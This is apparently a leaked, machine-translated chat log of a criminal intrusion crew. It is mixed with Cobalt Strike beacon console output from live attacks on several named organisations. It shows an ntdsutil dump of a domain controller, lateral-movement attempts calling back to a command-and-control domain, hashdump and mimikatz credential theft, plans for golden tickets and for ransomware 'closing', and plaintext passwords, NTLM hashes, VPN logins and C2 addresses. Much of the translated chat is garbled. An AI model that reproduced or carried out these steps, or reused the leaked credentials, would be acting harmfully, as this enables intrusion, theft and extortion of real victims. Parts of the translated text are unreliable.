[+] host called home, sent: 54 bytes
[+] received output:

SERVICE_NAME : vss
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

``qw.bat
```
ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q
``````
Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:10:53> shell wmic /node:CLINICDC process call create "cmd /c C:\qw.bat"
[*] Tasked beacon to run: wmic /node:CLINICDC process call create "cmd /c C:\qw.bat"
[+] host called home, sent: 89 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 56968;
	ReturnValue = 0;
};

``Schaa well smirivsm? Let's not predictionsa folder no chota do as I shot remotely of course)) and then the dk in the coba does not stretch? through ntds realistic to shoot if there is LA on dk@tl1horoshoda-so such computers that `Destination host unreachable`, leave alone?
Pinging NSTORE0.mcklrh.mig [192.168.254.110] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 192.168.254.110:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Ping from onehost not responding from all machines is not responding ok? From another machine may not responding from "destination host not responding" from another machine is not responding from another host saying that the host you are requesting is not found.
beacon> shell ping NSTORE0.mcklrh.mig
[*] Tasked beacon to run: ping NSTORE0.mcklrh.mig
[+] host called home, sent: 54 bytes
[+] received output:

Pinging NSTORE0.mcklrh.mig [192.168.254.110] with 32 bytes of data:
Reply from 192.168.254.92: Destination host unreachable.
Reply from 192.168.254.92: Destination host unreachable.
Reply from 192.168.254.92: Destination host unreachable.

[+] received output:
Reply from 192.168.254.92: Destination host unreachable.

Ping statistics for 192.168.254.110:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
beacon> shell dir \\192.168.254.110\C$
[*] Tasked beacon to run: dir \192.168.254.110\C$
[+] host called home, sent: 55 bytes
[+] received output:
The network path was not found.
```
```
beacon> jump winrm 192.168.254.110
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_42) on 192.168.254.110 via WinRM
[+] host called home, sent: 194407 bytes
[-] Could not connect to pipe: 53
[+] received output:
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">[192.168.254.110] Connecting to remote server failed with the following error m_x000D__x000A_</S><S S="Error">essage : The WinRM client cannot process the request. Default authentication ma_x000D__x000A_</S><S S="Error">y be used with an IP address under the following conditions: the transport is H_x000D__x000A_</S><S S="Error">TTPS or the destination is in the TrustedHosts list, and explicit credentials a_x000D__x000A_</S><S S="Error">re provided. Use winrm.cmd to configure TrustedHosts. Note that computers in th_x000D__x000A_</S><S S="Error">e TrustedHosts list might not be authenticated. For more information on how to _x000D__x000A_</S><S S="Error">set TrustedHosts run the following command: winrm help config. For more informa_x000D__x000A_</S><S S="Error">tion, see the about_Remote_Troubleshooting Help topic._x000D__x000A_</S><S S="Error"> + CategoryInfo : OpenError: (:) [], PSRemotingTransportException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : PSSessionStateBroken_x000D__x000A_</S></Objs>
 
beacon> jump winrm 192.168.254.110 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (palside.com:443) on 192.168.254.110 via WinRM
[+] host called home, sent: 198121 bytes
[+] received output:
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">[192.168.254.110] Connecting to remote server failed with the following error m_x000D__x000A_</S><S S="Error">essage : The WinRM client cannot process the request. Default authentication ma_x000D__x000A_</S><S S="Error">y be used with an IP address under the following conditions: the transport is H_x000D__x000A_</S><S S="Error">TTPS or the destination is in the TrustedHosts list, and explicit credentials a_x000D__x000A_</S><S S="Error">re provided. Use winrm.cmd to configure TrustedHosts. Note that computers in th_x000D__x000A_</S><S S="Error">e TrustedHosts list might not be authenticated. For more information on how to _x000D__x000A_</S><S S="Error">set TrustedHosts run the following command: winrm help config. For more informa_x000D__x000A_</S><S S="Error">tion, see the about_Remote_Troubleshooting Help topic._x000D__x000A_</S><S S="Error"> + CategoryInfo : OpenError: (:) [], PSRemotingTransportException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : PSSessionStateBroken_x000D__x000A_</S></Objs>
```
```
beacon> jump psexec 192.168.254.110 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (palside.com:443) on 192.168.254.110 via Service Control Manager (\\\192.168.254.110\ADMIN$\bd450eb.exe)
[+] host called home, sent: 287818 bytes
[-] could not upload file: 53
[-] Could not open service control manager on 192.168.254.110: 1722
 
beacon> jump psexec 192.168.254.110 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_42) on 192.168.254.110 via Service Control Manager (\\192.168.254.110\ADMIN$\05ebb47.exe)
[+] host called home, sent: 287872 bytes
[-] could not upload file: 53
[-] Could not open service control manager on 192.168.254.110: 1722
[-] Could not connect to pipe: 53
Give me the command and output the full output.
Reply from 192.168.254.92: Destination host unreachable.

Ping statistics for 192.168.254.110:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

If it was resolved normally before then, does that mean the host is offline? What should I do with it? It's logical that no ping or httpsjump doesn't work@tl1
If a host on a ping
```
Destination host unreachable
```
and when I ask for a dir
```
The network path was not found.
```
is it realistic to pull it in at all?
```
Msf::OptionValidateError One or more options failed to validate: RHOSTS.
`tu ta, he off status does not change in any way @user3 where? emho mc17 knocked in that domain :thinking:checked rights in this domainto and smb_login also did soProbably I understand if it by ip pulls cars from current domain on 1-2 hosts not sure but it is worth trying in smb_login can specify hostname instead of ip in rhosts? so and yet try to try not
\\10.5.50.192\
а
\\Maybe just ping the hostname instead of \audiology2.ffmg.local\and maybe just ping the hostname?:thinking:compare results with the one from the vulnerable one and from there ping another host from that domain ping the one you want and ping it through the one I showed you above.
[*] 10.5.50.192:445 - Output for "net localgroup administrators":

Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
FFMG\Domain Admins
FFMG\psanderson
LRHC\pdsanderson
The command completed successfully.
``This was pulling
```
paulsanderson.ffmg.local [10.10.220.45]
>operatingSystem: Windows XP Professional
```
it came up with this
```
Host Name: LRH001240
OS Name: Microsoft Windows 10 Pro
Registered Owner: lrhc
 
 
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
LRHC\Domain Admins
LRHC/Nessus Local Access
LRHC\Paragon_Users
``Did you pull syseminfo off the machine, is the hostname the one you pinged there? is the domain name full give an example of an addendum is hostnames how did you collect ipses here?
@echo off
setlocal enabledelayedexpansion
set OUTPUT_FILE=result.txt
>nul copy nul %OUTPUT_FILE%
echo HOSTNAME,LONGNAME,IPADDRESS,STATE >%OUTPUT_FILE%
for /f %%i in (ips.txt) do (
    set SERVER_ADDRESS_I=UNRESOLVED
    set SERVER_ADDRESS_L=UNRESOLVED
    for /f "tokens=1,2,3" %%x in ('ping -n 1 -a %%i ^&^& echo SERVER_IS_UP') do (
    if %%x==Ping set SERVER_ADDRESS_L=%y
    if %%x==Ping set SERVER_ADDRESS_I=%%z
        if %%x==SERVER_IS_UP (set SERVER_STATE=UP) else (set SERVER_STATE=DOWN)
    )
    echo %%i [!SERVER_ADDRESS_L::=!]
    echo %%i,!SERVER_ADDRESS_L::=!,!SERVER_ADDRESS_I::=!,!SERVER_STATE! >>%OUTPUT_FILE%
)
how did you ping hosts from trust? I'm talking about it,are you in trust domain? although in trust domain 10ok net systeminfo says there are 10 vindatk net domain in them gives out the current domain there is a suspicion that the cars in the current and trust domain match ipi and therefore cars from the current domain are pulled smb_logney can specify the hostname instead of ipi?check also the processes, os, avi t if not servers, then browsers check more processes[ ](https://mediaeveryone.com/group/lrhc-org?msg=mhrk8J5bowbKdJ4hp) some of them are not attracted, and those that are attracted, no cracks at all
```
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
[-] no results.
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
``user3 to and from the dedicator Copy not directly load through the kobone in what, just clarifying. archiver will pass in what problem? KB How to treat file download? It is necessary to download an exe to download the archive from ff. Is there info? I mean, it's worth a try, there is no alternative) well, such ... not that "wildly" noisy there are LA Credits on one of the servers) want to run sharfinder, it's noisy?, leave for half an hour I know that you can pull browsers if it's ff) there's still a sphere
We're not noisy yet, we're walking the net gently.
but without noise we can not get the crescendos from the sphere, so that on the day of closing we'll have to look for the sphere at once)~9 am, then for it is more likely to allocate the morning + I am so, to be aware of this particular one can move the network is still not ready for closing `` ``
The current time at \HJ-PRT-AZPROD.evo.local is 1/6/2021 8:54:24 AM

```
I think our default time to start at 03:00 here is not very suitable.  At 3 am - will be 16 days.Yes, and the network is not as bigtam admin vigil my respectMaybe even on the system are runes from the evil eyeThat thing they have https://redcanary.com/ `` ``
192.168.9.251:445 (platform: 500 version: 6.2 name: EPSON1BBE6E domain: WORKGROUP)
192.168.9.102:445 (platform: 500 version: 5.0 name: DOCKPRT domain: WORKGROUP ) EPSON WF-3540 Series
192.168.9.138:445 (platform: 500 version: 4.9 name: DC_CRTV_NAS1 domain: WORKGROUP) https://www.promise.com/Policy
it also has a tendency to detekeneeneene refuse vmikai as soon as you start will go back report without the possibility to interrupt the process just need to do when no one before closing can noise) Prepare a network taka how to get Codes then?) kb most likely noticed by Golden Ticket katintds, dxink us not to remove?
from the entry point under the vpnS-1-5-21-2479520119-439608908-2710113943user9[ ](https://mediaeveryone.com/group/evo-com?msg=juRtha4EjgGzs368R) In the chat room did not find the unlikely to change there krbttgolden ticket do iten I remember you ntds threw? can consult with colleagues while you have thoughts - doThe only thing that comes to mind, check through msf for holes... I have no experience with this situation (to raise the rights) to what? You have changed tasks while you work here, then do not validate where to roll check on the dk` ``
scanuser abc123$ - VALID FOR DC
work only from the entry pointChecked all the creeds (I mean if you use ms17 depending on how you set upMSF also burns fast Kb Right? Yes, I checked folders. folder? should have looked at processes and ctrl+f cb.exe)[ ](https://mediaeveryone.com/group/evo-com?msg=4yn2FwMFtnBJDw3yy) checked the wrong folder and jumped for joy (try again raise the rights for nothing you then climb.... the passwords changed + Captured the sheet as you raise the load give me a load```
172.93.201.193
https://keymiss.com
----------------------------------------------------------------------------------------
104.243.45.15:59880
Qlxso4SdwP3QODfp9NHqoxUb1qXy6OaeLka
``I'll give you a replacement, then we'll kick you out for 2 days maximum along with this one. So they're looking for our entry point. So they've worked off the Buy More...EVO.LOCAL what's your cob...EVO.LOCAL what's your domain?
```
  UserName : richards@continuant.com
  Password : MyW0rdPassW0rd!
``Now I need credentials to connect to the vpnUnlocked that sofos and opn vpn are the sameuser4user1pazhalustokin @user1 here:zany_face:and there's 6 hours there seemed idle time 0 hours 50 minutes stopmy guess they turned off the vpn for lunch there time 01:43 PM```
====== IdleTime ======

  CurrentUser : NT AUTHORITY\SYSTEM
  Idletime : 06h:50m:34s:109ms (1234234109 milliseconds)
``On the other computer TOSA is LA''.
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9f42fb1ba6b3f4d6eb0ee00efb127225:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Teddybear:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TOSA:1002:aad3b435b51404eeaad3b435b51404ee:bc89b78c7c12fd09c32b057a8e6d9ea6:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:fc6774e019e6b30db2715b90caa59d97:::
``````
Authentication Id : 0 ; 2182928437 (00000000:821cd835)
Session : NewCredentials from 0
User Name : richards
Domain : TELECOMLABSINC
Logon Server : (null)
Logon Time : 10/20/2020 11:08:16 AM
SID : S-1-5-21-2126783548-1955098733-1885625156-12800
	msv :
	 [00000003] Primary
	 * Username : Guest
	 * Domain : .
	 * NTLM : 3d2b4dfac512b7ef6188248b8e113cb9
	 * SHA1 : bc7d6d066111172ffd532d3de3967638b3f2c4b8ce
	 * DPAPI : 7def96ac9eab53c5eedb2fe0c01bb5d8
	tspkg :
	wdigest :
	 * Username : Guest
	 * Domain : (null)
	 * Password : (null)
	kerberos :
	 * Username : Guest
	 * Domain : (null)
	 * Password : Guest
	ssp :
	credman :

Authentication Id : 0 ; 3241371 (00000000:0031759b)
Session : Interactive from 1
User Name : richards
Domain : TELECOMLABSINC
Logon Server : FIFE-DC01
Logon Time : 10/6/2020 6:58:15 AM
SID : S-1-5-21-2126783548-1955098733-1885625156-12800
	msv :
	 [00000003] Primary
	 * Username : richards
	 * Domain : TELECOMLABSINC
	 * NTLM : 28c269c13bc52e3173e95e32a3b59086
	 * SHA1 : 2c4f93e65137e41d0d0726b29b75163e65d093b2
	 * DPAPI : 7d405a8c6affa51928af3bdf7ce47276
	tspkg :
	wdigest :
	 * Username : richards
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : richards
	 * Domain : TELECOMLABSINC.COM
	 * Password : (null)
	ssp :
	credman :
	 [00000000]
	 * Username : richards@continuant.com
	 * Domain : autologon.microsoftazuread-sso.com
	 * Password : MyW0rdPassW0rd!

Authentication Id : 0 ; 3239772 (00000000:00316f5c)
Session : Interactive from 1
User Name : richards
Domain : TELECOMLABSINC
Logon Server : FIFE-DC01
Logon Time : 10/6/2020 6:58:15 AM
SID : S-1-5-21-2126783548-1955098733-1885625156-12800
	msv :
	 [00000003] Primary
	 * Username : richards
	 * Domain : TELECOMLABSINC
	 * NTLM : 28c269c13bc52e3173e95e32a3b59086
	 * SHA1 : 2c4f93e65137e41d0d0726b29b75163e65d093b2
	 * DPAPI : 7d405a8c6affa51928af3bdf7ce47276
	tspkg :
	wdigest :
	 * Username : richards
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : richards
	 * Domain : TELECOMLABSINC.COM
	 * Password : (null)
	ssp :
	credman :
	 [00000000]
	 * Username : richards@continuant.com
	 * Domain : autologon.microsoftazuread-sso.com
	 * Password : MyW0rdPassW0rd!

Authentication Id : 0 ; 102596 (00000000:000190c4)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/6/2020 6:55:40 AM
SID : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 881a8b31fa3a3a2ffc06751e5ada89c1
	 * SHA1 : 782d12bcee0c5aa3bf6d0cc98b32705ff7f5194e
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : L-7NB3HC2$
	 * Domain : telecomlabsinc.com
	 * Password : c5 5c 13 59 42 d3 fa e2 e3 c8 50 7a 73 0d e4 14 17 fb 1f 9c ac f9 56 68 59 52 81 3e 01 d7 13 af 10 59 ca e2 74 c3 d1 34 b9 b8 ea 67 f7 59 39 ad 5e ad ed c5 4e f0 ec 8a c0 47 aa 88 8a 95 68 77 ba e2 93 b0 5c 0b 1b 1f e3 24 b8 6d 27 21 48 ad af 36 24 4d ee 57 52 5d 5d 91 64 26 7d a9 be 4b c3 1b 3a 94 f8 c4 69 6b 3a 97 95 ef 3b ce 78 2d a6 48 c2 ce 6b 64 ce 06 e5 14 a8 6a 5a 0c de b0 24 e6 78 8e 36 75 76 a0 d4 96 a1 99 c8 8d 6f 02 1c 12 e1 a2 ee c1 78 8e a0 a4 20 62 c5 48 9c 30 60 12 7f c6 7f cd 28 6c 5f b6 77 91 85 a2 d3 54 fb 83 c0 54 a5 9b f5 4b ec 0a f4 0d ec 4a 1b 65 51 59 ab 4c 60 73 1f 84 fb af 90 92 35 8c a2 ec 3b f8 99 c9 27 a3 d2 50 a8 19 e5 92 b6 a5 22 8f 5c 3f b0 85 56 0d 80 41 51 78 17 88 cb 60 1d a0
	ssp :
	credman :

Authentication Id : 0 ; 102551 (00000000:00019097)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/6/2020 6:55:40 AM
SID : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e
	 * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : L-7NB3HC2$
	 * Domain : telecomlabsinc.com
	 * Password : 49 69 69 a2 6a bd c5 80 d7 48 10 01 73 3e e4 3f 9e de 97 9c 9d 08 b6 ab e6 81 13 4c b3 13 d2 68 66 94 60 66 02 60 c1 ac fd 58 d7 72 dd 90 b8 eb fb 9c 92 de 97 59 cf 28 22 e4 f4 d5 b2 df 90 39 0d c9 16 c1 78 78 a8 69 96 10 f4 73 e6 77 d9 f8 64 96 53 33 e5 7b 25 15 e1 f4 4a 33 34 d0 5b 77 30 a9 93 a2 c5 ac c7 d1 cc b9 3d cb 68 dd d0 9a b3 be 83 ba 20 21 3c bc 8a 53 dc 78 3a 51 44 2e 29 9f e7 56 00 ed c1 d5 7a 5f a5 0e f2 a0 a5 e3 43 28 ee 74 1e 00 44 06 ba 4b 75 46 99 1e 09 9b 41 0f 7f ce ba bf 40 98 0b 9e 6e 55 4b e5 3a 35 fe 7f c0 cd 6e a2 85 b2 5d 86 ed 73 00 a3 fe c7 75 6b 2c 25 ca 25 27 4b 07 10 5e 23 68 79 73 16 89 9e 2f 96 17 3e 35 ba f5 f1 c2 ca f2 9b ec 2d 8f a9 4c 0a 12 07 0e 88 80 25 b7 ee 2e 1e 95 bb 0f
	ssp :
	credman :

Authentication Id : 0 ; 97351 (00000000:00017c47)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 10/6/2020 6:55:40 AM
SID : S-1-5-96-0-1
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e
	 * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : L-7NB3HC2$
	 * Domain : telecomlabsinc.com
	 * Password : 49 69 69 a2 6a bd c5 80 d7 48 10 01 73 3e e4 3f 9e de 97 9c 9d 08 b6 ab e6 81 13 4c b3 13 d2 68 66 94 60 66 02 60 c1 ac fd 58 d7 72 dd 90 b8 eb fb 9c 92 de 97 59 cf 28 22 e4 f4 d5 b2 df 90 39 0d c9 16 c1 78 78 a8 69 96 10 f4 73 e6 77 d9 f8 64 96 53 33 e5 7b 25 15 e1 f4 4a 33 34 d0 5b 77 30 a9 93 a2 c5 ac c7 d1 cc b9 3d cb 68 dd d0 9a b3 be 83 ba 20 21 3c bc 8a 53 dc 78 3a 51 44 2e 29 9f e7 56 00 ed c1 d5 7a 5f a5 0e f2 a0 a5 e3 43 28 ee 74 1e 00 44 06 ba 4b 75 46 99 1e 09 9b 41 0f 7f ce ba bf 40 98 0b 9e 6e 55 4b e5 3a 35 fe 7f c0 cd 6e a2 85 b2 5d 86 ed 73 00 a3 fe c7 75 6b 2c 25 ca 25 27 4b 07 10 5e 23 68 79 73 16 89 9e 2f 96 17 3e 35 ba f5 f1 c2 ca f2 9b ec 2d 8f a9 4c 0a 12 07 0e 88 80 25 b7 ee 2e 1e 95 bb 0f
	ssp :
	credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : L-7NB3HC2$
Domain : TELECOMLABSINC
Logon Server : (null)
Logon Time : 10/6/2020 6:55:40 AM
SID : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e
	 * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : l-7nb3hc2$
	 * Domain : TELECOMLABSINC.COM
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 10/6/2020 6:55:39 AM
SID : S-1-5-19
	msv :
	tspkg :
	wdigest :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	* kerberos :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 66921 (00000000:00010569)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 10/6/2020 6:55:39 AM
SID : S-1-5-96-0-0
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e
	 * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : L-7NB3HC2$
	 * Domain : telecomlabsinc.com
	 * Password : 49 69 69 a2 6a bd c5 80 d7 48 10 01 73 3e e4 3f 9e de 97 9c 9d 08 b6 ab e6 81 13 4c b3 13 d2 68 66 94 60 66 02 60 c1 ac fd 58 d7 72 dd 90 b8 eb fb 9c 92 de 97 59 cf 28 22 e4 f4 d5 b2 df 90 39 0d c9 16 c1 78 78 a8 69 96 10 f4 73 e6 77 d9 f8 64 96 53 33 e5 7b 25 15 e1 f4 4a 33 34 d0 5b 77 30 a9 93 a2 c5 ac c7 d1 cc b9 3d cb 68 dd d0 9a b3 be 83 ba 20 21 3c bc 8a 53 dc 78 3a 51 44 2e 29 9f e7 56 00 ed c1 d5 7a 5f a5 0e f2 a0 a5 e3 43 28 ee 74 1e 00 44 06 ba 4b 75 46 99 1e 09 9b 41 0f 7f ce ba bf 40 98 0b 9e 6e 55 4b e5 3a 35 fe 7f c0 cd 6e a2 85 b2 5d 86 ed 73 00 a3 fe c7 75 6b 2c 25 ca 25 27 4b 07 10 5e 23 68 79 73 16 89 9e 2f 96 17 3e 35 ba f5 f1 c2 ca f2 9b ec 2d 8f a9 4c 0a 12 07 0e 88 80 25 b7 ee 2e 1e 95 bb 0f
	ssp :
	credman :

Authentication Id : 0 ; 65920 (00000000:00010180)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 10/6/2020 6:55:39 AM
SID :
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e
	 * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : L-7NB3HC2$
Domain : TELECOMLABSINC
Logon Server : (null)
Logon Time : 10/6/2020 6:55:39 AM
SID : S-1-5-18
	msv :
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : l-7nb3hc2$
	 * Domain : TELECOMLABSINC.COM
	 * Password : (null)
	ssp :
	credman :

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
``I can't get to them on my desktop in browserox4proxy only from my ipi, as I understand it```.
SSL VPN
Address Https://173.12.52.229
System administrator Usrname/password dadmin/w3r3g00d
SSl VPN user midawivpn/m1daw1vpn
``````
ItemUrl : C:\Users\richards\Desktop\capture\World Vision - TomF\Managed Services_2011\Site Locations\Nashville\Continuant_Setup_TN-OR.doc
FileOwner : TELECOMLABSINC\richards
Size : 78848
DateCreated : 2/7/2020 3:11:15 PM
DateAccessed : 2/7/2020 3:11:15 PM
AutoSummary :
Continuant MAP Service Location Remote Access Data Sheet
World Vision - Nashville & Portland
Critical Info Needed to Begin Monitoring Setup (ASAP)
Call, email, or fax this critical info to PM listed below:
Customer Business Name and Location: World Vision
277 Mallory Station Rd., Suite 130, Franklin, TN 37067 Switch Dialup Number: 192.168.242.98 Switch Login: continuant SEB Password (if installed) Switch Password: R3mot3!
``````
ItemUrl : C:\Users\richards\Desktop\capture\World Vision - TomF\Managed Services_2011\Remote Access Information\Nortel-VPN-Login.txt
FileOwner : TELECOMLABSINC\richards
Size : 40
DateCreated : 2/7/2020 3:11:09 PM
DateAccessed : 2/7/2020 3:11:09 PM
AutoSummary :
username : continuant
password: e3nkq49v
``````
  Target : autologon.microsoftazuread-sso.com
  UserName : richards@continuant.com
  Password : MyW0rdPassW0rd!
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 2/24/2020 11:30:58 AM
``Then you need to look for configurationsHours ago domain was responding, now it won't respondNet-GPPPassword seems to be down
```
[RESULT] Username: Administrator
[RESULT] Changed: 2015-02-06 18:27:57
[RESULT] Password: $6t]:sw2@3ed
``````
beacon> net domain
[*] Tasked beacon to run net domain
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 87853 bytes
[+] received output:
telecomlabsinc.com
[+] received output:
Domain Controllers:

[-] Error: 0

beacon> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
TELECOMLABSINC\Domain Admins
TELECOMLABSINC\richards
TOSA
The command completed successfully.


beacon> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain telecomlabsinc.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
art.admin chrisma.admin daniel.admin
MSSQL ServerAdmin$ sissel.admin
svc_cisco_ldap
The command completed successfully.


beacon> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain telecomlabsinc.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
chrisma.admin daniel.admin ServerAdmin$
The command completed successfully.


Good night good night everybody remember to ask and help each other and also go home so as long as there are no questions still 20 min + approached the passwords say sticky notes or something like that tomorrow by 3 so you in the water check on the rdp their desktops for notes on it2) if there are questions then ask1) take the archive with builds so the password will passthanks)not before 12 home, I hope you close one network at least) Merry Christmas!Merry Christmas to all!!! Tomorrow by 3:30 workpozapozavlya forgot that yesterday was a holidayWe merry Christmas to all) pure koba!
23.106.223.123
https://tagdel.com
----------------------------------------------------------------------------------------
192.111.147.254:45008
RqwB6Sj9MH8NKzVrm9Xllv8uLBQWxZryhtM
``SIDH*G&8SDIGvS*DIF^*GSHIGUYRH``mailsniper works through the sameExchange administrator (i.e. member of "Exchange Organization Administrators" or "Organization Management" group)water path in the same network+- ExchangeOrganization Management in EAC the account with backup access should be in the group in other cases under the tops are directors, chief accountants, etc, If you can't back up everything, it could be that they just have their mail hosted, it's not that easy to download a backup, let me tell you about it.if it's not internal, it's external if there are no mail servers in the network, do we skip it?
in evo have not yet found and it seems that it is not tor the main thing do not forget because in the account is stored information about the sessions, and you can obviously get there through the web1 network 1 account can leave or every time a new registrar?the question you take backups that waymaybe someone else read this dialogue today in #water-way @user8 learned how to download fat files from the network a couple of things who do not know i wait in the groups info from additional tasks as well give out +1 cobu prozapasyasya you will give 2 builds, if you reach the stage of closing you close at your discretion on reports and results in the confusa tomorrow I will not be, work independently on #waterway-com and on #rtpcompany-com finalize + additional tasks + lf you remember about the additional tasks on the networks?a couple of announcements so everyone distract yourselves it's waterwaypo rdp hooked up to harper and reading slack#ballymoregroup-com#evo-com#waterway-com
#1-done-rtpcompany-com + so I understand we have 4 networks in operation?:space_invader:helloHiHiHiWhen tomorrow from 9 I'll fuck Asya's head ISPproboot already passedHow to do now go homeNo, no access there at the moment.chief warned that with the modems fucked?This naebalovo how to pay would have turned off and allAnd one was Yetavsky in which there was no sim, but it works in access to the lk tipo forgotModems were under simki I did everything in my power, I'm not a magic fairy and modems were flashed? No five sim, I half a Sunday drove around different fuckers who sell allegedly with sim simki modems. Of the 6 did not work at any of them. they in the spirit of all providers fuck up with the internet, and the fuck to count on them I told him on Friday to buy 5 fucking modems and simmosStalin: I have agreed to connect the morning. I paid all the bills on the eve. The manager forgot about us. Is there anything I can do? Computers also put not a complete set. Drove half a day assembled them. Some of the parts didn't work and I had to go and change them. Who do I need to talk to? I wrote the boss yesterday that the computers were messed up. Said it happens.user3 had to provide you with the Internet in the morning, I still wrote him on Friday that you do? Now what do we do? apparently with someone will talkInternet bills all paid We signed the contract Tk a lot of customers were coming tomorrow Said she had a working day until 6 Now we got through the whole day 